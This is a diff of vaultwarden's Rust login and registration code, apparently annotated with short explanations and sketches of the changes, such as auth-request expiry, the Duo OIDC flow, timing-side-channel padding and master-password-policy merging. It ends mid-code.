-        None => err!("Username or password is incorrect. Try again", format!("IP: {}. Username: {}.", ip.ip, username)),
+    let Some(mut user) = User::find_by_mail(username, conn).await else {
+        err!("Username or password is incorrect. Try again", format!("IP: {}. Username: {username}.", ip.ip))
     };

-    // Set the user_uuid here to be passed back used for event logging.
-    *user_uuid = Some(user.uuid.clone());
+    // Set the user_id here to be passed back used for event logging.
+    *user_id = Some(user.uuid.clone());

-    // Check password
-    let password = data.password.as_ref().unwrap();
-    if let Some(auth_request_uuid) = data.auth_request.clone() {
-        if let Some(auth_request) = AuthRequest::find_by_uuid(auth_request_uuid.as_str(), conn).await {
-            if !auth_request.check_access_code(password) {
-                err!(
-                    "Username or access code is incorrect. Try again",
-                    format!("IP: {}. Username: {}.", ip.ip, username),
-                    ErrorEvent {
-                        event: EventType::UserFailedLogIn,
-                    }
-                )
-            }
-        } else {
-            err!(
-                "Auth request not found. Try again.",
-                format!("IP: {}. Username: {}.", ip.ip, username),
+    // Check if the user is disabled
+    if !user.enabled {
+        err!(
+            "This user has been disabled",
+            format!("IP: {}. Username: {username}.", ip.ip),
+            ErrorEvent {
+                event: EventType::UserFailedLogIn
+            }
+        )
+    }
+
+    let password = data.password.as_ref().unwrap();
+
+    // If we get an auth request, we don't check the user's password, but the access code of the auth request
+    if let Some(ref auth_request_id) = data.auth_request {
+        let Some(auth_request) = AuthRequest::find_by_uuid_and_user(auth_request_id, &user.uuid, conn).await else {
+            err!(
+                "Auth request not found. Try again.",
+                format!("IP: {}. Username: {username}.", ip.ip),
+                ErrorEvent {
+                    event: EventType::UserFailedLogIn,
+                }
+            )
+        };
+
+        let expiration_time = auth_request.creation_date + chrono::Duration::minutes(5);
+        let request_expired = Utc::now().naive_utc() >= expiration_time;
+
+        if auth_request.user_uuid != user.uuid
+            || !auth_request.approved.unwrap_or(false)
+            || request_expired
+            || ip.ip.to_string() != auth_request.request_ip
+            || !auth_request.check_access_code(password)
+        {
+            err!(
+                "Username or access code is incorrect. Try again",
+                format!("IP: {}. Username: {username}.", ip.ip),
                 ErrorEvent {
                     event: EventType::UserFailedLogIn,
                 }
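The new code hard-expires login-with-device approval requests after five minutes and checks them against the requesting user and IP before accepting the access code. The expiry arithmetic in isolation, using the same chrono types as above (standalone sketch, not the vaultwarden function):

```rust
use chrono::{Duration, NaiveDateTime, Utc};

// Same rule as the diff: a request older than five minutes no longer counts.
fn request_expired(creation_date: NaiveDateTime) -> bool {
    let expiration_time = creation_date + Duration::minutes(5);
    Utc::now().naive_utc() >= expiration_time
}

fn main() {
    let just_created = Utc::now().naive_utc();
    assert!(!request_expired(just_created));
    assert!(request_expired(just_created - Duration::minutes(6)));
}
```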
@@ -186,34 +204,23 @@ async fn _password_login(
|
|||||||
} else if !user.check_valid_password(password) {
|
} else if !user.check_valid_password(password) {
|
||||||
err!(
|
err!(
|
||||||
"Username or password is incorrect. Try again",
|
"Username or password is incorrect. Try again",
|
||||||
format!("IP: {}. Username: {}.", ip.ip, username),
|
format!("IP: {}. Username: {username}.", ip.ip),
|
||||||
ErrorEvent {
|
ErrorEvent {
|
||||||
event: EventType::UserFailedLogIn,
|
event: EventType::UserFailedLogIn,
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
}
|
}
|
||||||
|
|
||||||
// Change the KDF Iterations
|
// Change the KDF Iterations (only when not logging in with an auth request)
|
||||||
if user.password_iterations != CONFIG.password_iterations() {
|
if data.auth_request.is_none() && user.password_iterations != CONFIG.password_iterations() {
|
||||||
user.password_iterations = CONFIG.password_iterations();
|
user.password_iterations = CONFIG.password_iterations();
|
||||||
user.set_password(password, None, false, None);
|
user.set_password(password, None, false, None);
|
||||||
|
|
||||||
if let Err(e) = user.save(conn).await {
|
if let Err(e) = user.save(conn).await {
|
||||||
error!("Error updating user: {:#?}", e);
|
error!("Error updating user: {e:#?}");
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// Check if the user is disabled
|
|
||||||
if !user.enabled {
|
|
||||||
err!(
|
|
||||||
"This user has been disabled",
|
|
||||||
format!("IP: {}. Username: {}.", ip.ip, username),
|
|
||||||
ErrorEvent {
|
|
||||||
event: EventType::UserFailedLogIn
|
|
||||||
}
|
|
||||||
)
|
|
||||||
}
|
|
||||||
|
|
||||||
let now = Utc::now().naive_utc();
|
let now = Utc::now().naive_utc();
|
||||||
|
|
||||||
if user.verified_at.is_none() && CONFIG.mail_enabled() && CONFIG.signups_verify() {
|
if user.verified_at.is_none() && CONFIG.mail_enabled() && CONFIG.signups_verify() {
|
||||||
@@ -229,11 +236,11 @@ async fn _password_login(
|
|||||||
user.login_verify_count += 1;
|
user.login_verify_count += 1;
|
||||||
|
|
||||||
if let Err(e) = user.save(conn).await {
|
if let Err(e) = user.save(conn).await {
|
||||||
error!("Error updating user: {:#?}", e);
|
error!("Error updating user: {e:#?}");
|
||||||
}
|
}
|
||||||
|
|
||||||
if let Err(e) = mail::send_verify_email(&user.email, &user.uuid).await {
|
if let Err(e) = mail::send_verify_email(&user.email, &user.uuid).await {
|
||||||
error!("Error auto-sending email verification email: {:#?}", e);
|
error!("Error auto-sending email verification email: {e:#?}");
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -241,7 +248,7 @@ async fn _password_login(
         // We still want the login to fail until they actually verified the email address
         err!(
             "Please verify your email before trying again.",
-            format!("IP: {}. Username: {}.", ip.ip, username),
+            format!("IP: {}. Username: {username}.", ip.ip),
             ErrorEvent {
                 event: EventType::UserFailedLogIn
             }
@@ -250,11 +257,11 @@ async fn _password_login(
 
     let (mut device, new_device) = get_device(&data, conn, &user).await;
 
-    let twofactor_token = twofactor_auth(&user, &data, &mut device, ip, conn).await?;
+    let twofactor_token = twofactor_auth(&user, &data, &mut device, ip, client_version, conn).await?;
 
     if CONFIG.mail_enabled() && new_device {
-        if let Err(e) = mail::send_new_device_logged_in(&user.email, &ip.ip.to_string(), &now, &device.name).await {
-            error!("Error sending new device email: {:#?}", e);
+        if let Err(e) = mail::send_new_device_logged_in(&user.email, &ip.ip.to_string(), &now, &device).await {
+            error!("Error sending new device email: {e:#?}");
 
             if CONFIG.require_device_email() {
                 err!(
@@ -278,10 +285,12 @@ async fn _password_login(
     // Because this might get used in the future, and is add by the Bitwarden Server, lets keep it, but then commented out
     // See: https://github.com/dani-garcia/vaultwarden/issues/4156
     // ---
-    // let orgs = UserOrganization::find_confirmed_by_user(&user.uuid, conn).await;
+    // let members = Membership::find_confirmed_by_user(&user.uuid, conn).await;
-    let (access_token, expires_in) = device.refresh_tokens(&user, scope_vec);
+    let (access_token, expires_in) = device.refresh_tokens(&user, scope_vec, data.client_id);
     device.save(conn).await?;
 
+    let master_password_policy = master_password_policy(&user, conn).await;
+
     let mut result = json!({
         "access_token": access_token,
         "expires_in": expires_in,
@@ -295,9 +304,11 @@ async fn _password_login(
         "KdfIterations": user.client_kdf_iter,
         "KdfMemory": user.client_kdf_memory,
         "KdfParallelism": user.client_kdf_parallelism,
-        "ResetMasterPassword": false,// TODO: Same as above
+        "ResetMasterPassword": false, // TODO: Same as above
+        "ForcePasswordReset": false,
+        "MasterPasswordPolicy": master_password_policy,
 
         "scope": scope,
-        "unofficialServer": true,
         "UserDecryptionOptions": {
             "HasMasterPassword": !user.password_hash.is_empty(),
             "Object": "userDecryptionOptions"
@@ -308,13 +319,13 @@ async fn _password_login(
         result["TwoFactorToken"] = Value::String(token);
     }
 
-    info!("User {} logged in successfully. IP: {}", username, ip.ip);
+    info!("User {username} logged in successfully. IP: {}", ip.ip);
     Ok(Json(result))
 }
 
 async fn _api_key_login(
     data: ConnectData,
-    user_uuid: &mut Option<String>,
+    user_id: &mut Option<UserId>,
     conn: &mut DbConn,
     ip: &ClientIp,
 ) -> JsonResult {
@@ -323,7 +334,7 @@ async fn _api_key_login(
 
     // Validate scope
     match data.scope.as_ref().unwrap().as_ref() {
-        "api" => _user_api_key_login(data, user_uuid, conn, ip).await,
+        "api" => _user_api_key_login(data, user_id, conn, ip).await,
         "api.organization" => _organization_api_key_login(data, conn, ip).await,
         _ => err!("Scope not supported"),
     }
@@ -331,23 +342,22 @@ async fn _api_key_login(
 
 async fn _user_api_key_login(
     data: ConnectData,
-    user_uuid: &mut Option<String>,
+    user_id: &mut Option<UserId>,
     conn: &mut DbConn,
     ip: &ClientIp,
 ) -> JsonResult {
     // Get the user via the client_id
     let client_id = data.client_id.as_ref().unwrap();
-    let client_user_uuid = match client_id.strip_prefix("user.") {
-        Some(uuid) => uuid,
-        None => err!("Malformed client_id", format!("IP: {}.", ip.ip)),
+    let Some(client_user_id) = client_id.strip_prefix("user.") else {
+        err!("Malformed client_id", format!("IP: {}.", ip.ip))
     };
-    let user = match User::find_by_uuid(client_user_uuid, conn).await {
-        Some(user) => user,
-        None => err!("Invalid client_id", format!("IP: {}.", ip.ip)),
+    let client_user_id: UserId = client_user_id.into();
+    let Some(user) = User::find_by_uuid(&client_user_id, conn).await else {
+        err!("Invalid client_id", format!("IP: {}.", ip.ip))
     };
 
-    // Set the user_uuid here to be passed back used for event logging.
-    *user_uuid = Some(user.uuid.clone());
+    // Set the user_id here to be passed back used for event logging.
+    *user_id = Some(user.uuid.clone());
 
     // Check if the user is disabled
     if !user.enabled {
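The `match`-to-`let ... else` rewrites in this hunk are behavior-preserving: the happy path stays unindented and the `else` arm must diverge. A minimal standalone sketch of the pattern (function and message names are illustrative, not from the codebase):

fn parse_client_id(client_id: &str) -> Result<&str, String> {
    // Before: bind on Some, diverge on None, via a match.
    // let user_part = match client_id.strip_prefix("user.") {
    //     Some(part) => part,
    //     None => return Err("Malformed client_id".into()),
    // };

    // After: let-else keeps the success value in scope without nesting.
    let Some(user_part) = client_id.strip_prefix("user.") else {
        return Err("Malformed client_id".into());
    };
    Ok(user_part)
}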
@@ -376,8 +386,8 @@ async fn _user_api_key_login(
 
     if CONFIG.mail_enabled() && new_device {
         let now = Utc::now().naive_utc();
-        if let Err(e) = mail::send_new_device_logged_in(&user.email, &ip.ip.to_string(), &now, &device.name).await {
-            error!("Error sending new device email: {:#?}", e);
+        if let Err(e) = mail::send_new_device_logged_in(&user.email, &ip.ip.to_string(), &now, &device).await {
+            error!("Error sending new device email: {e:#?}");
 
             if CONFIG.require_device_email() {
                 err!(
@@ -397,8 +407,8 @@ async fn _user_api_key_login(
     // Because this might get used in the future, and is add by the Bitwarden Server, lets keep it, but then commented out
     // See: https://github.com/dani-garcia/vaultwarden/issues/4156
     // ---
-    // let orgs = UserOrganization::find_confirmed_by_user(&user.uuid, conn).await;
+    // let members = Membership::find_confirmed_by_user(&user.uuid, conn).await;
-    let (access_token, expires_in) = device.refresh_tokens(&user, scope_vec);
+    let (access_token, expires_in) = device.refresh_tokens(&user, scope_vec, data.client_id);
     device.save(conn).await?;
 
     info!("User {} logged in successfully via API key. IP: {}", user.email, ip.ip);
@@ -416,9 +426,8 @@ async fn _user_api_key_login(
         "KdfIterations": user.client_kdf_iter,
         "KdfMemory": user.client_kdf_memory,
         "KdfParallelism": user.client_kdf_parallelism,
-        "ResetMasterPassword": false, // TODO: Same as above
+        "ResetMasterPassword": false, // TODO: according to official server seems something like: user.password_hash.is_empty(), but would need testing
         "scope": "api",
-        "unofficialServer": true,
     });
 
     Ok(Json(result))
@@ -427,13 +436,12 @@ async fn _user_api_key_login(
 async fn _organization_api_key_login(data: ConnectData, conn: &mut DbConn, ip: &ClientIp) -> JsonResult {
     // Get the org via the client_id
     let client_id = data.client_id.as_ref().unwrap();
-    let org_uuid = match client_id.strip_prefix("organization.") {
-        Some(uuid) => uuid,
-        None => err!("Malformed client_id", format!("IP: {}.", ip.ip)),
+    let Some(org_id) = client_id.strip_prefix("organization.") else {
+        err!("Malformed client_id", format!("IP: {}.", ip.ip))
     };
-    let org_api_key = match OrganizationApiKey::find_by_org_uuid(org_uuid, conn).await {
-        Some(org_api_key) => org_api_key,
-        None => err!("Invalid client_id", format!("IP: {}.", ip.ip)),
+    let org_id: OrganizationId = org_id.to_string().into();
+    let Some(org_api_key) = OrganizationApiKey::find_by_org_uuid(&org_id, conn).await else {
+        err!("Invalid client_id", format!("IP: {}.", ip.ip))
     };
 
     // Check API key.
@@ -450,7 +458,6 @@ async fn _organization_api_key_login(data: ConnectData, conn: &mut DbConn, ip: &
         "expires_in": 3600,
         "token_type": "Bearer",
         "scope": "api.organization",
-        "unofficialServer": true,
     })))
 }
 
@@ -480,6 +487,7 @@ async fn twofactor_auth(
     data: &ConnectData,
     device: &mut Device,
     ip: &ClientIp,
+    client_version: &Option<ClientVersion>,
     conn: &mut DbConn,
 ) -> ApiResult<Option<String>> {
     let twofactors = TwoFactor::find_by_user(&user.uuid, conn).await;
@@ -490,14 +498,19 @@ async fn twofactor_auth(
         return Ok(None);
     }
 
-    TwoFactorIncomplete::mark_incomplete(&user.uuid, &device.uuid, &device.name, ip, conn).await?;
+    TwoFactorIncomplete::mark_incomplete(&user.uuid, &device.uuid, &device.name, device.atype, ip, conn).await?;
 
     let twofactor_ids: Vec<_> = twofactors.iter().map(|tf| tf.atype).collect();
     let selected_id = data.two_factor_provider.unwrap_or(twofactor_ids[0]); // If we aren't given a two factor provider, assume the first one
 
     let twofactor_code = match data.two_factor_token {
         Some(ref code) => code,
-        None => err_json!(_json_err_twofactor(&twofactor_ids, &user.uuid, conn).await?, "2FA token not provided"),
+        None => {
+            err_json!(
+                _json_err_twofactor(&twofactor_ids, &user.uuid, data, client_version, conn).await?,
+                "2FA token not provided"
+            )
+        }
     };
 
     let selected_twofactor = twofactors.into_iter().find(|tf| tf.atype == selected_id && tf.enabled);
@@ -514,10 +527,26 @@ async fn twofactor_auth(
         Some(TwoFactorType::Webauthn) => webauthn::validate_webauthn_login(&user.uuid, twofactor_code, conn).await?,
         Some(TwoFactorType::YubiKey) => yubikey::validate_yubikey_login(twofactor_code, &selected_data?).await?,
         Some(TwoFactorType::Duo) => {
-            duo::validate_duo_login(data.username.as_ref().unwrap().trim(), twofactor_code, conn).await?
+            match CONFIG.duo_use_iframe() {
+                true => {
+                    // Legacy iframe prompt flow
+                    duo::validate_duo_login(&user.email, twofactor_code, conn).await?
+                }
+                false => {
+                    // OIDC based flow
+                    duo_oidc::validate_duo_login(
+                        &user.email,
+                        twofactor_code,
+                        data.client_id.as_ref().unwrap(),
+                        data.device_identifier.as_ref().unwrap(),
+                        conn,
+                    )
+                    .await?
+                }
+            }
         }
         Some(TwoFactorType::Email) => {
-            email::validate_email_code_str(&user.uuid, twofactor_code, &selected_data?, conn).await?
+            email::validate_email_code_str(&user.uuid, twofactor_code, &selected_data?, &ip.ip, conn).await?
         }
 
         Some(TwoFactorType::Remember) => {
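Both Duo branches hang off one boolean config switch: `duo_use_iframe()` picks the legacy iframe prompt, otherwise the OIDC redirect flow is used. A self-contained sketch of that select-by-config shape; the types and string formats here are hypothetical stand-ins, not the real `duo`/`duo_oidc` APIs:

struct Config {
    duo_use_iframe: bool,
}

enum DuoChallenge {
    // Legacy flow: the client renders an iframe against the Duo host.
    Iframe { host: String, signature: String },
    // OIDC flow: the client is redirected to an authorization URL.
    AuthUrl(String),
}

fn duo_challenge(cfg: &Config, email: &str) -> DuoChallenge {
    match cfg.duo_use_iframe {
        true => DuoChallenge::Iframe {
            host: "api-example.duosecurity.com".to_string(),
            signature: format!("signed-request-for-{email}"),
        },
        false => DuoChallenge::AuthUrl(format!("https://duo.example/authorize?login_hint={email}")),
    }
}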
@@ -527,7 +556,7 @@ async fn twofactor_auth(
         }
         _ => {
             err_json!(
-                _json_err_twofactor(&twofactor_ids, &user.uuid, conn).await?,
+                _json_err_twofactor(&twofactor_ids, &user.uuid, data, client_version, conn).await?,
                 "2FA Remember token not provided"
             )
         }
@@ -555,12 +584,21 @@ fn _selected_data(tf: Option<TwoFactor>) -> ApiResult<String> {
     tf.map(|t| t.data).map_res("Two factor doesn't exist")
 }
 
-async fn _json_err_twofactor(providers: &[i32], user_uuid: &str, conn: &mut DbConn) -> ApiResult<Value> {
+async fn _json_err_twofactor(
+    providers: &[i32],
+    user_id: &UserId,
+    data: &ConnectData,
+    client_version: &Option<ClientVersion>,
+    conn: &mut DbConn,
+) -> ApiResult<Value> {
     let mut result = json!({
         "error" : "invalid_grant",
         "error_description" : "Two factor required.",
-        "TwoFactorProviders" : providers,
-        "TwoFactorProviders2" : {} // { "0" : null }
+        "TwoFactorProviders" : providers.iter().map(ToString::to_string).collect::<Vec<String>>(),
+        "TwoFactorProviders2" : {}, // { "0" : null }
+        "MasterPasswordPolicy": {
+            "Object": "masterPasswordPolicy"
+        }
     });
 
     for provider in providers {
@@ -570,46 +608,70 @@ async fn _json_err_twofactor(providers: &[i32], user_uuid: &str, conn: &mut DbConn
         Some(TwoFactorType::Authenticator) => { /* Nothing to do for TOTP */ }
 
         Some(TwoFactorType::Webauthn) if CONFIG.domain_set() => {
-            let request = webauthn::generate_webauthn_login(user_uuid, conn).await?;
+            let request = webauthn::generate_webauthn_login(user_id, conn).await?;
             result["TwoFactorProviders2"][provider.to_string()] = request.0;
         }
 
         Some(TwoFactorType::Duo) => {
-            let email = match User::find_by_uuid(user_uuid, conn).await {
+            let email = match User::find_by_uuid(user_id, conn).await {
                 Some(u) => u.email,
                 None => err!("User does not exist"),
             };
 
-            let (signature, host) = duo::generate_duo_signature(&email, conn).await?;
-
-            result["TwoFactorProviders2"][provider.to_string()] = json!({
-                "Host": host,
-                "Signature": signature,
-            });
+            match CONFIG.duo_use_iframe() {
+                true => {
+                    // Legacy iframe prompt flow
+                    let (signature, host) = duo::generate_duo_signature(&email, conn).await?;
+                    result["TwoFactorProviders2"][provider.to_string()] = json!({
+                        "Host": host,
+                        "Signature": signature,
+                    })
+                }
+                false => {
+                    // OIDC based flow
+                    let auth_url = duo_oidc::get_duo_auth_url(
+                        &email,
+                        data.client_id.as_ref().unwrap(),
+                        data.device_identifier.as_ref().unwrap(),
+                        conn,
+                    )
+                    .await?;
+
+                    result["TwoFactorProviders2"][provider.to_string()] = json!({
+                        "AuthUrl": auth_url,
+                    })
+                }
+            }
         }
 
         Some(tf_type @ TwoFactorType::YubiKey) => {
-            let twofactor = match TwoFactor::find_by_user_and_type(user_uuid, tf_type as i32, conn).await {
-                Some(tf) => tf,
-                None => err!("No YubiKey devices registered"),
+            let Some(twofactor) = TwoFactor::find_by_user_and_type(user_id, tf_type as i32, conn).await else {
+                err!("No YubiKey devices registered")
             };
 
             let yubikey_metadata: yubikey::YubikeyMetadata = serde_json::from_str(&twofactor.data)?;
 
             result["TwoFactorProviders2"][provider.to_string()] = json!({
-                "Nfc": yubikey_metadata.Nfc,
+                "Nfc": yubikey_metadata.nfc,
             })
         }
 
         Some(tf_type @ TwoFactorType::Email) => {
-            let twofactor = match TwoFactor::find_by_user_and_type(user_uuid, tf_type as i32, conn).await {
-                Some(tf) => tf,
-                None => err!("No twofactor email registered"),
+            let Some(twofactor) = TwoFactor::find_by_user_and_type(user_id, tf_type as i32, conn).await else {
+                err!("No twofactor email registered")
             };
 
-            // Send email immediately if email is the only 2FA option
-            if providers.len() == 1 {
-                email::send_token(user_uuid, conn).await?
+            // Starting with version 2025.5.0 the client will call `/api/two-factor/send-email-login`.
+            let disabled_send = if let Some(cv) = client_version {
+                let ver_match = semver::VersionReq::parse(">=2025.5.0").unwrap();
+                ver_match.matches(&cv.0)
+            } else {
+                false
+            };
+
+            // Send email immediately if email is the only 2FA option.
+            if providers.len() == 1 && !disabled_send {
+                email::send_token(user_id, conn).await?
             }
 
             let email_data = email::EmailTokenData::from_json(&twofactor.data)?;
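The `disabled_send` gate above leans on the `semver` crate: clients at or above 2025.5.0 fetch the 2FA email themselves via `/api/two-factor/send-email-login`, so the server stops sending one eagerly. A small sketch of how such a requirement check behaves (version strings are arbitrary examples):

use semver::{Version, VersionReq};

fn client_requests_email_itself(client_version: Option<&Version>) -> bool {
    // Unknown client versions fall back to the old eager-send behavior.
    let req = VersionReq::parse(">=2025.5.0").expect("static requirement is valid");
    client_version.map(|v| req.matches(v)).unwrap_or(false)
}

fn main() {
    assert!(client_requests_email_itself(Some(&Version::parse("2025.6.1").unwrap())));
    assert!(!client_requests_email_itself(Some(&Version::parse("2024.12.0").unwrap())));
    assert!(!client_requests_email_itself(None));
}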
@@ -626,19 +688,80 @@ async fn _json_err_twofactor(providers: &[i32], user_uuid: &str, conn: &mut DbConn
 }
 
 #[post("/accounts/prelogin", data = "<data>")]
-async fn prelogin(data: JsonUpcase<PreloginData>, conn: DbConn) -> Json<Value> {
+async fn prelogin(data: Json<PreloginData>, conn: DbConn) -> Json<Value> {
     _prelogin(data, conn).await
 }
 
 #[post("/accounts/register", data = "<data>")]
-async fn identity_register(data: JsonUpcase<RegisterData>, conn: DbConn) -> JsonResult {
-    _register(data, conn).await
+async fn identity_register(data: Json<RegisterData>, conn: DbConn) -> JsonResult {
+    _register(data, false, conn).await
+}
+
+#[derive(Debug, Deserialize)]
+#[serde(rename_all = "camelCase")]
+struct RegisterVerificationData {
+    email: String,
+    name: Option<String>,
+    // receiveMarketingEmails: bool,
+}
+
+#[derive(rocket::Responder)]
+enum RegisterVerificationResponse {
+    NoContent(()),
+    Token(Json<String>),
+}
+
+#[post("/accounts/register/send-verification-email", data = "<data>")]
+async fn register_verification_email(
+    data: Json<RegisterVerificationData>,
+    mut conn: DbConn,
+) -> ApiResult<RegisterVerificationResponse> {
+    let data = data.into_inner();
+
+    // the registration can only continue if signup is allowed or there exists an invitation
+    if !(CONFIG.is_signup_allowed(&data.email)
+        || (!CONFIG.mail_enabled() && Invitation::find_by_mail(&data.email, &mut conn).await.is_some()))
+    {
+        err!("Registration not allowed or user already exists")
+    }
+
+    let should_send_mail = CONFIG.mail_enabled() && CONFIG.signups_verify();
+
+    let token_claims =
+        crate::auth::generate_register_verify_claims(data.email.clone(), data.name.clone(), should_send_mail);
+    let token = crate::auth::encode_jwt(&token_claims);
+
+    if should_send_mail {
+        let user = User::find_by_mail(&data.email, &mut conn).await;
+        if user.filter(|u| u.private_key.is_some()).is_some() {
+            // There is still a timing side channel here in that the code
+            // paths that send mail take noticeably longer than ones that
+            // don't. Add a randomized sleep to mitigate this somewhat.
+            use rand::{rngs::SmallRng, Rng, SeedableRng};
+            let mut rng = SmallRng::from_os_rng();
+            let delta: i32 = 100;
+            let sleep_ms = (1_000 + rng.random_range(-delta..=delta)) as u64;
+            tokio::time::sleep(tokio::time::Duration::from_millis(sleep_ms)).await;
+        } else {
+            mail::send_register_verify_email(&data.email, &token).await?;
+        }
+
+        Ok(RegisterVerificationResponse::NoContent(()))
+    } else {
+        // If email verification is not required, return the token directly
+        // the clients will use this token to finish the registration
+        Ok(RegisterVerificationResponse::Token(Json(token)))
+    }
+}
+
+#[post("/accounts/register/finish", data = "<data>")]
+async fn register_finish(data: Json<RegisterData>, conn: DbConn) -> JsonResult {
+    _register(data, true, conn).await
 }
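The randomized sleep in `register_verification_email` exists so a request for an already-registered address (which sends no mail) takes roughly as long as one that does send mail, blunting an account-enumeration timing oracle. The same idea in isolation, mirroring the rand 0.9 calls used above; the 1s plus-or-minus 100ms budget is taken from this diff, not a general recommendation:

use rand::{rngs::SmallRng, Rng, SeedableRng};

async fn equalize_latency() {
    // Pad the fast path to about the cost of sending a mail, with jitter
    // so the padding cannot be averaged away over repeated requests.
    let mut rng = SmallRng::from_os_rng();
    let delta: i32 = 100;
    let sleep_ms = (1_000 + rng.random_range(-delta..=delta)) as u64;
    tokio::time::sleep(tokio::time::Duration::from_millis(sleep_ms)).await;
}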
 
 // https://github.com/bitwarden/jslib/blob/master/common/src/models/request/tokenRequest.ts
 // https://github.com/bitwarden/mobile/blob/master/src/Core/Models/Request/TokenRequest.cs
 #[derive(Debug, Clone, Default, FromForm)]
-#[allow(non_snake_case)]
 struct ConnectData {
     #[field(name = uncased("grant_type"))]
     #[field(name = uncased("granttype"))]
@@ -665,7 +788,7 @@ struct ConnectData {
 
     #[field(name = uncased("device_identifier"))]
     #[field(name = uncased("deviceidentifier"))]
-    device_identifier: Option<String>,
+    device_identifier: Option<DeviceId>,
     #[field(name = uncased("device_name"))]
     #[field(name = uncased("devicename"))]
     device_name: Option<String>,
@@ -688,7 +811,7 @@ struct ConnectData {
     #[field(name = uncased("twofactorremember"))]
     two_factor_remember: Option<i32>,
     #[field(name = uncased("authrequest"))]
-    auth_request: Option<String>,
+    auth_request: Option<AuthRequestId>,
 }
 
 fn _check_is_some<T>(value: &Option<T>, msg: &str) -> EmptyResult {
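Several `Option<String>` fields above became dedicated ID types (`DeviceId`, `AuthRequestId`, and friends), so a device identifier can no longer be passed where a user id is expected. A plausible shape for such a newtype, inferred from how the diff uses them (`.into()` from strings, `.as_ref()` to `&str`, `.to_string()`); the real definitions live in `src/db/models` and may differ:

#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub struct UserId(String);

impl From<String> for UserId {
    fn from(s: String) -> Self {
        UserId(s)
    }
}

impl From<&str> for UserId {
    fn from(s: &str) -> Self {
        UserId(s.to_string())
    }
}

impl AsRef<str> for UserId {
    fn as_ref(&self) -> &str {
        &self.0
    }
}

impl std::fmt::Display for UserId {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        self.0.fmt(f)
    }
}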
@@ -23,7 +23,7 @@ pub use crate::api::{
     icons::routes as icons_routes,
     identity::routes as identity_routes,
     notifications::routes as notifications_routes,
-    notifications::{start_notification_server, AnonymousNotify, Notify, UpdateType, WS_ANONYMOUS_SUBSCRIPTIONS},
+    notifications::{AnonymousNotify, Notify, UpdateType, WS_ANONYMOUS_SUBSCRIPTIONS, WS_USERS},
     push::{
         push_cipher_update, push_folder_update, push_logout, push_send_update, push_user_update, register_push_device,
         unregister_push_device,
@@ -32,24 +32,22 @@ pub use crate::api::{
     web::routes as web_routes,
     web::static_files,
 };
-use crate::db::{models::User, DbConn};
-use crate::util;
+use crate::db::{
+    models::{OrgPolicy, OrgPolicyType, User},
+    DbConn,
+};
 
 // Type aliases for API methods results
 type ApiResult<T> = Result<T, crate::error::Error>;
 pub type JsonResult = ApiResult<Json<Value>>;
 pub type EmptyResult = ApiResult<()>;
 
-type JsonUpcase<T> = Json<util::UpCase<T>>;
-type JsonUpcaseVec<T> = Json<Vec<util::UpCase<T>>>;
-type JsonVec<T> = Json<Vec<T>>;
-
 // Common structs representing JSON data received
 #[derive(Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 struct PasswordOrOtpData {
-    MasterPasswordHash: Option<String>,
-    Otp: Option<String>,
+    master_password_hash: Option<String>,
+    otp: Option<String>,
 }
 
 impl PasswordOrOtpData {
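Replacing the PascalCase fields (and the old `JsonUpcase` wrapper) with `#[serde(rename_all = "camelCase")]` keeps the camelCase wire format while the Rust fields follow normal snake_case naming. A quick sketch of the mapping:

use serde::Deserialize;

#[derive(Deserialize)]
#[serde(rename_all = "camelCase")]
struct PasswordOrOtp {
    master_password_hash: Option<String>, // deserialized from "masterPasswordHash"
    otp: Option<String>,                  // deserialized from "otp"
}

fn main() {
    let parsed: PasswordOrOtp =
        serde_json::from_str(r#"{"masterPasswordHash":"abc123","otp":null}"#).unwrap();
    assert_eq!(parsed.master_password_hash.as_deref(), Some("abc123"));
}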
@@ -59,7 +57,7 @@ impl PasswordOrOtpData {
     pub async fn validate(&self, user: &User, delete_if_valid: bool, conn: &mut DbConn) -> EmptyResult {
         use crate::api::core::two_factor::protected_actions::validate_protected_action_otp;
 
-        match (self.MasterPasswordHash.as_deref(), self.Otp.as_deref()) {
+        match (self.master_password_hash.as_deref(), self.otp.as_deref()) {
             (Some(pw_hash), None) => {
                 if !user.check_valid_password(pw_hash) {
                     err!("Invalid password");
@@ -73,3 +71,49 @@ impl PasswordOrOtpData {
         Ok(())
     }
 }
+
+#[derive(Debug, Default, Deserialize, Serialize)]
+#[serde(rename_all = "camelCase")]
+pub struct MasterPasswordPolicy {
+    min_complexity: Option<u8>,
+    min_length: Option<u32>,
+    require_lower: bool,
+    require_upper: bool,
+    require_numbers: bool,
+    require_special: bool,
+    enforce_on_login: bool,
+}
+
+// Fetch all valid Master Password Policies and merge them into one with all trues and largest numbers as one policy
+async fn master_password_policy(user: &User, conn: &DbConn) -> Value {
+    let master_password_policies: Vec<MasterPasswordPolicy> =
+        OrgPolicy::find_accepted_and_confirmed_by_user_and_active_policy(
+            &user.uuid,
+            OrgPolicyType::MasterPassword,
+            conn,
+        )
+        .await
+        .into_iter()
+        .filter_map(|p| serde_json::from_str(&p.data).ok())
+        .collect();
+
+    let mut mpp_json = if !master_password_policies.is_empty() {
+        json!(master_password_policies.into_iter().reduce(|acc, policy| {
+            MasterPasswordPolicy {
+                min_complexity: acc.min_complexity.max(policy.min_complexity),
+                min_length: acc.min_length.max(policy.min_length),
+                require_lower: acc.require_lower || policy.require_lower,
+                require_upper: acc.require_upper || policy.require_upper,
+                require_numbers: acc.require_numbers || policy.require_numbers,
+                require_special: acc.require_special || policy.require_special,
+                enforce_on_login: acc.enforce_on_login || policy.enforce_on_login,
+            }
+        }))
+    } else {
+        json!({})
+    };
+
+    // NOTE: Upstream still uses PascalCase here for `Object`!
+    mpp_json["Object"] = json!("masterPasswordPolicy");
+    mpp_json
+}
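The `reduce` above folds all applicable org policies into the strictest combination: booleans are OR-ed together and numeric limits take the maximum. The same fold, trimmed down so it can be checked in isolation:

#[derive(Clone, Copy, Debug, PartialEq)]
struct Policy {
    min_length: Option<u32>,
    require_special: bool,
}

fn merge(policies: Vec<Policy>) -> Option<Policy> {
    policies.into_iter().reduce(|acc, p| Policy {
        // Option<u32> ordering: None < Some(_), so a concrete limit always wins.
        min_length: acc.min_length.max(p.min_length),
        require_special: acc.require_special || p.require_special,
    })
}

fn main() {
    let merged = merge(vec![
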